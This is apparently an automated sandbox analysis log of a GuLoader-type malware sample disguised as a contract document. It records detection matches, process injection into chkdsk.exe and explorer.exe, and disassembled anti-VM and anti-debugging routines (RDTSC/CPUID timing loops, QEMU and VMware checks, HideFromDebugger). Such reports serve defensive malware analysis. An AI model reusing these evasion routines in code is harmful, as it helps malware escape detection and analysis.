      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
      Source: Binary string: chkdsk.pdbGCTL source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.514667556.00000000000B0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000D.00000000.498357108.00000000075A0000.00000002.00000001.sdmp
      Source: Binary string: chkdsk.pdb source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.514667556.00000000000B0000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: UAE CONTRACT SUPPLY.exe, 00000003.00000002.519848532.000000001E5BF000.00000040.00000001.sdmp, chkdsk.exe, 00000010.00000002.632699169.00000000057AF000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: UAE CONTRACT SUPPLY.exe, chkdsk.exe
      Source: Binary string: wscui.pdb source: explorer.exe, 0000000D.00000000.498357108.00000000075A0000.00000002.00000001.sdmp

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: UAE CONTRACT SUPPLY.exe PID: 6848, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: UAE CONTRACT SUPPLY.exe PID: 6952, type: MEMORY
      Yara detected VB6 Downloader GenericShow sources
      Source: Yara matchFile source: Process Memory Space: UAE CONTRACT SUPPLY.exe PID: 6848, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: UAE CONTRACT SUPPLY.exe PID: 6952, type: MEMORY
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_00409C7D push ss; retf 1_2_00409C7E
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0040B823 pushfd ; retf 1_2_0040B83A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_00409D6C push ebx; retf 1_2_00409D06
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_00409D7E push ss; retf 1_2_00409F0A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_00409E5B push ss; retf 1_2_00409F0A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_00407341 push ebx; retf 1_2_00407342
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_00409F49 push ss; retf 1_2_00409F0A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0040A765 push 00000062h; retf 1_2_0040A767
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0040B370 push eax; ret 1_2_0040B371
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226005D push FFFFFFB9h; retf 1_2_02260068
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02260130 push FFFFFFB9h; retf 1_2_02260141
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E51D0D1 push ecx; ret 3_2_1E51D0E4
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0570D0D1 push ecx; ret 16_2_0570D0E4
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CF519C push esi; iretd 16_2_00CF51A2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CE6108 push cs; iretd 16_2_00CE610F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFCA50 push 0000005Ah; ret 16_2_00CFCA52
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFB3FB push eax; ret 16_2_00CFB462
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFB3F2 push eax; ret 16_2_00CFB3F8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFB3A5 push eax; ret 16_2_00CFB3F8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFBB58 push ebp; iretd 16_2_00CFBB59
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CEC308 push ds; iretd 16_2_00CEC309
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFBCB2 push cs; iretd 16_2_00CFBCB3
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFB45C push eax; ret 16_2_00CFB462
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFB5BB push ebp; ret 16_2_00CFBA3E
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CF4EAE push eax; iretd 16_2_00CF4EB0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_00CFBEAB push ecx; iretd 16_2_00CFBEAC
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion:

      barindex
      Contains functionality to detect hardware virtualization (CPUID execution measurement)Show sources
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226054E EnumWindows,NtSetInformationThread,1_2_0226054E
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022652C8 NtSetInformationThread,1_2_022652C8
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_005652C8 3_2_005652C8
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 0000000002260457 second address: 0000000002260457 instructions:
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 00000000022652A9 second address: 00000000022652A9 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F29049E4728h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d cmp dx, dx 0x00000020 test ah, ah 0x00000022 add edi, edx 0x00000024 cmp dl, bl 0x00000026 dec dword ptr [ebp+000000F8h] 0x0000002c cmp dword ptr [ebp+000000F8h], 00000000h 0x00000033 jne 00007F29049E46FEh 0x00000035 cmp dx, 3BF6h 0x0000003a cmp dl, dl 0x0000003c call 00007F29049E477Ah 0x00000041 call 00007F29049E4738h 0x00000046 lfence 0x00000049 mov edx, dword ptr [7FFE0014h] 0x0000004f lfence 0x00000052 ret 0x00000053 mov esi, edx 0x00000055 pushad 0x00000056 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 0000000002265176 second address: 0000000002265176 instructions:
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 0000000002265B0F second address: 0000000002265B0F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp byte ptr [ebx], FFFFFFE8h 0x0000000d jne 00007F29049E3212h 0x0000000f test bh, FFFFFFD2h 0x00000012 cmp bl, bl 0x00000014 cmp byte ptr [ebx], FFFFFFB8h 0x00000017 jne 00007F29049E31E8h 0x00000019 cmp ecx, 00002000h 0x0000001f jne 00007F29049E30D5h 0x00000025 inc ecx 0x00000026 inc ebx 0x00000027 test ch, ch 0x00000029 cmp dword ptr [ebx], 9090C350h 0x0000002f jne 00007F29049E31D6h 0x00000031 jmp 00007F29049E31E2h 0x00000033 test cx, dx 0x00000036 cmp edx, dword ptr [ebx] 0x00000038 jne 00007F29049E31CEh 0x0000003a pushad 0x0000003b rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 0000000000564E71 second address: 0000000000564E71 instructions:
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: UAE CONTRACT SUPPLY.exe, 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, UAE CONTRACT SUPPLY.exe, 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE9
      Source: UAE CONTRACT SUPPLY.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 0000000002262D1F second address: 0000000002262D1F instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, ebx 0x0000000d mov ecx, 00001000h 0x00000012 cmp ebx, eax 0x00000014 div ecx 0x00000016 cmp edx, 00000000h 0x00000019 jne 00007F29049E46E2h 0x0000001b dec ebx 0x0000001c xor edx, edx 0x0000001e jmp 00007F29049E473Eh 0x00000020 pushad 0x00000021 lfence 0x00000024 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 0000000002260457 second address: 0000000002260457 instructions:
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 00000000022652A9 second address: 00000000022652A9 instructions: 0x00000000 rdtsc 0x00000002 xor eax, eax 0x00000004 inc eax 0x00000005 cpuid 0x00000007 popad 0x00000008 call 00007F29049E4728h 0x0000000d lfence 0x00000010 mov edx, dword ptr [7FFE0014h] 0x00000016 lfence 0x00000019 ret 0x0000001a sub edx, esi 0x0000001c ret 0x0000001d cmp dx, dx 0x00000020 test ah, ah 0x00000022 add edi, edx 0x00000024 cmp dl, bl 0x00000026 dec dword ptr [ebp+000000F8h] 0x0000002c cmp dword ptr [ebp+000000F8h], 00000000h 0x00000033 jne 00007F29049E46FEh 0x00000035 cmp dx, 3BF6h 0x0000003a cmp dl, dl 0x0000003c call 00007F29049E477Ah 0x00000041 call 00007F29049E4738h 0x00000046 lfence 0x00000049 mov edx, dword ptr [7FFE0014h] 0x0000004f lfence 0x00000052 ret 0x00000053 mov esi, edx 0x00000055 pushad 0x00000056 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 00000000022652F2 second address: 00000000022652F2 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F29049E3695h 0x0000001d popad 0x0000001e call 00007F29049E32E0h 0x00000023 lfence 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 0000000002265176 second address: 0000000002265176 instructions:
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 0000000002265B0F second address: 0000000002265B0F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp byte ptr [ebx], FFFFFFE8h 0x0000000d jne 00007F29049E3212h 0x0000000f test bh, FFFFFFD2h 0x00000012 cmp bl, bl 0x00000014 cmp byte ptr [ebx], FFFFFFB8h 0x00000017 jne 00007F29049E31E8h 0x00000019 cmp ecx, 00002000h 0x0000001f jne 00007F29049E30D5h 0x00000025 inc ecx 0x00000026 inc ebx 0x00000027 test ch, ch 0x00000029 cmp dword ptr [ebx], 9090C350h 0x0000002f jne 00007F29049E31D6h 0x00000031 jmp 00007F29049E31E2h 0x00000033 test cx, dx 0x00000036 cmp edx, dword ptr [ebx] 0x00000038 jne 00007F29049E31CEh 0x0000003a pushad 0x0000003b rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 0000000000562D1F second address: 0000000000562D1F instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, ebx 0x0000000d mov ecx, 00001000h 0x00000012 cmp ebx, eax 0x00000014 div ecx 0x00000016 cmp edx, 00000000h 0x00000019 jne 00007F29049E46E2h 0x0000001b dec ebx 0x0000001c xor edx, edx 0x0000001e jmp 00007F29049E473Eh 0x00000020 pushad 0x00000021 lfence 0x00000024 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 00000000005652F2 second address: 00000000005652F2 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e xor eax, eax 0x00000010 inc eax 0x00000011 cpuid 0x00000013 bt ecx, 1Fh 0x00000017 jc 00007F29049E3695h 0x0000001d popad 0x0000001e call 00007F29049E32E0h 0x00000023 lfence 0x00000026 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 0000000000564E71 second address: 0000000000564E71 instructions:
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000CE85E4 second address: 0000000000CE85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\chkdsk.exeRDTSC instruction interceptor: First address: 0000000000CE896E second address: 0000000000CE8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022608D0 rdtsc 1_2_022608D0
      Source: C:\Windows\explorer.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\chkdsk.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: explorer.exe, 0000000D.00000000.499784826.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
      Source: explorer.exe, 0000000D.00000000.499829502.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: UAE CONTRACT SUPPLY.exe, 00000001.00000002.389525388.0000000002260000.00000040.00000001.sdmp, UAE CONTRACT SUPPLY.exe, 00000003.00000002.514696348.0000000000562000.00000040.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe9
      Source: explorer.exe, 0000000D.00000000.493235369.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 0000000D.00000002.649228259.000000000641C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 0000000D.00000000.499784826.00000000083E9000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 0000000D.00000002.649228259.000000000641C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 0000000D.00000002.648636841.00000000062E0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
      Source: explorer.exe, 0000000D.00000000.499476016.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
      Source: explorer.exe, 0000000D.00000000.493235369.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: UAE CONTRACT SUPPLY.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 0000000D.00000000.493235369.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 0000000D.00000000.499476016.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
      Source: explorer.exe, 0000000D.00000000.499829502.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
      Source: explorer.exe, 0000000D.00000000.493235369.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: explorer.exe, 0000000D.00000002.631792237.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging:

      barindex
      Contains functionality to hide a thread from the debuggerShow sources
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226054E NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,000000001_2_0226054E
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeProcess queried: DebugPortJump to behavior
      Source: C:\Windows\SysWOW64\chkdsk.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022608D0 rdtsc 1_2_022608D0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02263A1C LdrInitializeThunk,1_2_02263A1C
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02264B16 mov eax, dword ptr fs:[00000030h]1_2_02264B16
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02264FBF mov eax, dword ptr fs:[00000030h]1_2_02264FBF
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_0226206F mov eax, dword ptr fs:[00000030h]1_2_0226206F
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02262078 mov eax, dword ptr fs:[00000030h]1_2_02262078
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022658C3 mov eax, dword ptr fs:[00000030h]1_2_022658C3
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_02262CDC mov eax, dword ptr fs:[00000030h]1_2_02262CDC
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022658DB mov eax, dword ptr fs:[00000030h]1_2_022658DB
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 1_2_022619AF mov eax, dword ptr fs:[00000030h]1_2_022619AF
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D7E41 mov eax, dword ptr fs:[00000030h]3_2_1E4D7E41
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D7E41 mov eax, dword ptr fs:[00000030h]3_2_1E4D7E41
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D7E41 mov eax, dword ptr fs:[00000030h]3_2_1E4D7E41
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D7E41 mov eax, dword ptr fs:[00000030h]3_2_1E4D7E41
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D7E41 mov eax, dword ptr fs:[00000030h]3_2_1E4D7E41
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D7E41 mov eax, dword ptr fs:[00000030h]3_2_1E4D7E41
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58AE44 mov eax, dword ptr fs:[00000030h]3_2_1E58AE44
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E58AE44 mov eax, dword ptr fs:[00000030h]3_2_1E58AE44
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D766D mov eax, dword ptr fs:[00000030h]3_2_1E4D766D
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EAE73 mov eax, dword ptr fs:[00000030h]3_2_1E4EAE73
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EAE73 mov eax, dword ptr fs:[00000030h]3_2_1E4EAE73
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EAE73 mov eax, dword ptr fs:[00000030h]3_2_1E4EAE73
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EAE73 mov eax, dword ptr fs:[00000030h]3_2_1E4EAE73
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EAE73 mov eax, dword ptr fs:[00000030h]3_2_1E4EAE73
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CC600 mov eax, dword ptr fs:[00000030h]3_2_1E4CC600
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CC600 mov eax, dword ptr fs:[00000030h]3_2_1E4CC600
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CC600 mov eax, dword ptr fs:[00000030h]3_2_1E4CC600
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F8E00 mov eax, dword ptr fs:[00000030h]3_2_1E4F8E00
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E581608 mov eax, dword ptr fs:[00000030h]3_2_1E581608
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FA61C mov eax, dword ptr fs:[00000030h]3_2_1E4FA61C
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FA61C mov eax, dword ptr fs:[00000030h]3_2_1E4FA61C
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E57FE3F mov eax, dword ptr fs:[00000030h]3_2_1E57FE3F
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4CE620 mov eax, dword ptr fs:[00000030h]3_2_1E4CE620
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F36CC mov eax, dword ptr fs:[00000030h]3_2_1E4F36CC
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E598ED6 mov eax, dword ptr fs:[00000030h]3_2_1E598ED6
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E57FEC0 mov eax, dword ptr fs:[00000030h]3_2_1E57FEC0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E508EC7 mov eax, dword ptr fs:[00000030h]3_2_1E508EC7
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4F16E0 mov ecx, dword ptr fs:[00000030h]3_2_1E4F16E0
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4D76E2 mov eax, dword ptr fs:[00000030h]3_2_1E4D76E2
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55FE87 mov eax, dword ptr fs:[00000030h]3_2_1E55FE87
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E5446A7 mov eax, dword ptr fs:[00000030h]3_2_1E5446A7
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E590EA5 mov eax, dword ptr fs:[00000030h]3_2_1E590EA5
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E590EA5 mov eax, dword ptr fs:[00000030h]3_2_1E590EA5
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E590EA5 mov eax, dword ptr fs:[00000030h]3_2_1E590EA5
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DEF40 mov eax, dword ptr fs:[00000030h]3_2_1E4DEF40
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4DFF60 mov eax, dword ptr fs:[00000030h]3_2_1E4DFF60
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E598F6A mov eax, dword ptr fs:[00000030h]3_2_1E598F6A
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FA70E mov eax, dword ptr fs:[00000030h]3_2_1E4FA70E
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FA70E mov eax, dword ptr fs:[00000030h]3_2_1E4FA70E
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55FF10 mov eax, dword ptr fs:[00000030h]3_2_1E55FF10
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E55FF10 mov eax, dword ptr fs:[00000030h]3_2_1E55FF10
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E59070D mov eax, dword ptr fs:[00000030h]3_2_1E59070D
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E59070D mov eax, dword ptr fs:[00000030h]3_2_1E59070D
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4EF716 mov eax, dword ptr fs:[00000030h]3_2_1E4EF716
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C4F2E mov eax, dword ptr fs:[00000030h]3_2_1E4C4F2E
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4C4F2E mov eax, dword ptr fs:[00000030h]3_2_1E4C4F2E
      Source: C:\Users\user\Desktop\UAE CONTRACT SUPPLY.exeCode function: 3_2_1E4FE730 mov eax, dword ptr fs:[00000030h]3_2_1E4FE730
